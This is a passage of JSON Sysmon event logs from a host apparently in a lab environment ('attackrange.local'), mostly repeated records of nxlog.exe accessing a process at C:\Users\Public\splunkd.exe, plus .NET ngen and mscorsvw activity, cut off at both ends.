(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:32.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:32.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:33.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:33.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:34.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:34.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:35.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:35.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:36.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:36.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:36.867\r\nProcessGuid: {E2A3D6B1-12D3-5F25-0000-00106AF40900}\r\nProcessId: 4512\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11a0-0\\System.Data.dll\r\nCreationUtcTime: 2020-08-01 06:59:36.867","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:36.867","ProcessGuid":"{E2A3D6B1-12D3-5F25-0000-00106AF40900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11a0-0\\System.Data.dll","CreationUtcTime":"2020-08-01 06:59:36.867","EventReceivedTime":"2020-08-01 06:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:37.008\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12D9-5F25-0000-0010C5FA0900}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:37.008","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12D9-5F25-0000-0010C5FA0900}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\